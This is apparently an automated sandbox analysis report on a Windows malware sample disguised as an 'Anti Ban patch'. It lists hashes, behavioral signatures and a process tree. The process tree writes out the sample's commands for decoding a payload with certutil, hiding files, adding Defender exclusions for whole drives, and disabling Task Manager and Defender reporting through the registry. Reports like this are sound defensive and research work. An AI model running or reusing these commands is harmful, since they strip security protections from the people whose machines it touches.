Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28/02/2024, 02:36
Static task
static1
Behavioral task
behavioral1
Sample
aac90b5b7246530741aeb4fc99a6ddaa.exe
Resource
win7-20240221-en
General
-
Target
aac90b5b7246530741aeb4fc99a6ddaa.exe
-
Size
1.8MB
-
MD5
aac90b5b7246530741aeb4fc99a6ddaa
-
SHA1
68726895c8de2331f8b82e8019deaf7f5e0aa01c
-
SHA256
99811b1ec2fb41ef3161af37e331658fac52a916d74f657444d6f9fdb7c1c186
-
SHA512
a5e5593fb4bfc8092ef0feb1161318447538506e5f1315fda63cddca2538b21bc2189aed7d0f151054da78eeb4ae11350b03c2180faef02455bf5228f282dcb2
-
SSDEEP
24576:vEvR5G0NicrR8Qi3BmQiVJQuwoecTtWtoV+Ec0xMkd8JsU3AoOqqIpWsR5F:vwR5G0NhR8Qi3GV+cgtoHqqIpWsR5F
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe -
Disables Task Manager via registry modification
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2608 attrib.exe 3060 attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2568 powershell.exe 2484 powershell.exe 2816 powershell.exe 2720 powershell.exe 1416 powershell.exe 1344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeDebugPrivilege 1344 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2952 wrote to memory of 760 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 29 PID 2952 wrote to memory of 760 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 29 PID 2952 wrote to memory of 760 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 29 PID 2952 wrote to memory of 2884 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 30 PID 2952 wrote to memory of 2884 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 30 PID 2952 wrote to memory of 2884 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 30 PID 2952 wrote to memory of 3048 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 31 PID 2952 wrote to memory of 3048 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 31 PID 2952 wrote to memory of 3048 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 31 PID 3048 wrote to memory of 2500 3048 cmd.exe 32 PID 3048 wrote to memory of 2500 3048 cmd.exe 32 PID 3048 wrote to memory of 2500 3048 cmd.exe 32 PID 2952 wrote to memory of 2028 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 33 PID 2952 wrote to memory of 2028 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 33 PID 2952 wrote to memory of 2028 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 33 PID 2952 wrote to memory of 2516 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 34 PID 2952 wrote to memory of 2516 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 34 PID 2952 wrote to memory of 2516 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 34 PID 2952 wrote to memory of 2536 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 35 PID 2952 wrote to memory of 2536 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 35 PID 2952 wrote to memory of 2536 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 35 PID 2952 wrote to memory of 2644 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 36 PID 2952 wrote to memory of 2644 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 36 PID 2952 wrote to memory of 2644 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 36 PID 2644 wrote to memory of 2652 2644 cmd.exe 37 PID 2644 wrote to memory of 2652 2644 cmd.exe 37 PID 2644 wrote to memory of 2652 2644 cmd.exe 37 PID 2952 wrote to memory of 2664 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 38 PID 2952 wrote to memory of 2664 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 38 PID 2952 wrote to memory of 2664 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 38 PID 2664 wrote to memory of 2672 2664 cmd.exe 39 PID 2664 wrote to memory of 2672 2664 cmd.exe 39 PID 2664 wrote to memory of 2672 2664 cmd.exe 39 PID 2952 wrote to memory of 2760 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 40 PID 2952 wrote to memory of 2760 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 40 PID 2952 wrote to memory of 2760 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 40 PID 2952 wrote to memory of 2904 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 41 PID 2952 wrote to memory of 2904 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 41 PID 2952 wrote to memory of 2904 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 41 PID 2952 wrote to memory of 2560 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 42 PID 2952 wrote to memory of 2560 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 42 PID 2952 wrote to memory of 2560 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 42 PID 2560 wrote to memory of 2552 2560 cmd.exe 43 PID 2560 wrote to memory of 2552 2560 cmd.exe 43 PID 2560 wrote to memory of 2552 2560 cmd.exe 43 PID 2952 wrote to memory of 2540 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 44 PID 2952 wrote to memory of 2540 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 44 PID 2952 wrote to memory of 2540 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 44 PID 2540 wrote to memory of 2608 2540 cmd.exe 45 PID 2540 wrote to memory of 2608 2540 cmd.exe 45 PID 2540 wrote to memory of 2608 2540 cmd.exe 45 PID 2952 wrote to memory of 2416 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 46 PID 2952 wrote to memory of 2416 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 46 PID 2952 wrote to memory of 2416 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 46 PID 2416 wrote to memory of 3060 2416 cmd.exe 47 PID 2416 wrote to memory of 3060 2416 cmd.exe 47 PID 2416 wrote to memory of 3060 2416 cmd.exe 47 PID 2952 wrote to memory of 2892 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 48 PID 2952 wrote to memory of 2892 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 48 PID 2952 wrote to memory of 2892 2952 aac90b5b7246530741aeb4fc99a6ddaa.exe 48 PID 2892 wrote to memory of 2568 2892 cmd.exe 49 PID 2892 wrote to memory of 2568 2892 cmd.exe 49 PID 2892 wrote to memory of 2568 2892 cmd.exe 49 PID 2892 wrote to memory of 2484 2892 cmd.exe 50 -
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 2652 attrib.exe 2672 attrib.exe 2608 attrib.exe 3060 attrib.exe 1188 attrib.exe 1640 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aac90b5b7246530741aeb4fc99a6ddaa.exe"C:\Users\Admin\AppData\Local\Temp\aac90b5b7246530741aeb4fc99a6ddaa.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.dll") >nul2⤵PID:760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.bat") >nul2⤵PID:2884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -decode "%appdata%\Microsoft\Protect\KFICND.dll" "%appdata%\Microsoft\Protect\KFICND.bat" >nul2⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\system32\certutil.execertutil -decode "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.bat"3⤵PID:2500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c call "%appdata%\Microsoft\Protect\KFICND.bat"2⤵PID:2028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.dll") >nul2⤵PID:2516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.bat") >nul2⤵PID:2536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll"" >nul2⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\system32\attrib.exeAttrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll""3⤵
- Views/modifies file attributes
PID:2652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"" >nul2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\attrib.exeAttrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat""3⤵
- Views/modifies file attributes
PID:2672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll") >nul2⤵PID:2760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat") >nul2⤵PID:2904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -decode "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll" "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat" >nul2⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\system32\certutil.execertutil -decode "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"3⤵PID:2552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Attrib +S +H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"" >nul2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\attrib.exeAttrib +S +H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat""3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Attrib +S +H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll"" >nul2⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\attrib.exeAttrib +S +H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll""3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c call "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "D:"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:/NEWDRIVERS"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\NEWDRIVERS2"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v DisableTaskMgr /t REG_DWORD /d 13⤵PID:1508
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v SpynetReporting /t REG_DWORD /d 03⤵PID:1248
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v SubmitSamplesConsent /t REG_DWORD /d 23⤵PID:616
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /f /v DisableNotificationCenter /t REG_DWORD /d 13⤵PID:1756
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /f /v DisableEnhancedNotifications /t REG_DWORD /d 13⤵
- Modifies Windows Defender notification settings
PID:1472
-
-
C:\Windows\system32\xcopy.exeXCOPY Bin\Mensaje.vbs C:\NEWDRIVERS /Y3⤵PID:2000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll"" >nul2⤵PID:2372
-
C:\Windows\system32\attrib.exeAttrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll""3⤵
- Views/modifies file attributes
PID:1188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"" >nul2⤵PID:1108
-
C:\Windows\system32\attrib.exeAttrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat""3⤵
- Views/modifies file attributes
PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll") >nul2⤵PID:2288
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat") >nul2⤵PID:2364
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
174B
MD56ef23a73bb6f911d522ea5fb934cb4b3
SHA1e59665f75c29d41090bf604f5b2dd387400b4436
SHA25662000a9ca00d44d4602306c795081f6ccf2c15724911874b51d16949c6759614
SHA5128d4eabced6f579e53410f08aa50407fe6a980b6d66a7e2e0f3b8509aa780ef50654b67623dc0dba865ebc0f22b764f8043c89a62cb4c7c1f071f462c406764ab
-
Filesize
296B
MD5141d051bfa65caae138c60e613691bcc
SHA1f6986986d303669b3b1d09317101b67fe33da8bc
SHA256f98f27dd854a8806013c88248b51fe66efbf19112cde22dac3c21ac820e6bac9
SHA512b76c8896faed2dd42fa617e41533acefbec483a17b80005982d5c92b15aeada46536572b223e508b298480aa90943f3e9a29b575596d5ce7a34e7780121e2afe
-
Filesize
1KB
MD56343dee17a3e08d9fc78f520a6d177e1
SHA1cbe3d0456ca954470d8f5da2badc07961ea6b0e6
SHA2561343cbe790feb85cb43322c448844d60370348c68bc1c27fca59bb8b8af4ae02
SHA5129b3abe607fe86824fbfb8ea508006225f4fba308dd9455fb319ced3cdaf5c6063d28946386705ce47000adc3f9e5a7b7631b4db1e7ca076a7890cf589c5e8421
-
Filesize
2KB
MD5f2063c3a364683464a8d80b3a5204bca
SHA12115e45254e65eeb71b9c8d3cb22bf75208830ec
SHA256a455130af538666bbb7743482bea04dc82bf5e9c1706980acfeac60ed2d89ee0
SHA5124c7c022250cbd67aa97a43e628ed642f1cc173bb3313d02221bdc11efa7c15adf669840bd81d4ec4c699a654dbb952756781dafa4d0039b125524c7c7578d87b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5145a21060290ab4c41f0bda18d9001b7
SHA1f90ce2135e5113fdd35f5aab9cc35bd0fac005a1
SHA25683016b1dda655e4c7834992ed0f62c6e8ccacec3a946d5e8507aa9515ed4c4b7
SHA512afc807e5dbaf6c9b363d38de348a9568a8cd7ead9f28efaa99ece7862d2de943a744a3e101fa41ca54ecc83444aa6a9d47ee83a5dd2297643749b3e9da420842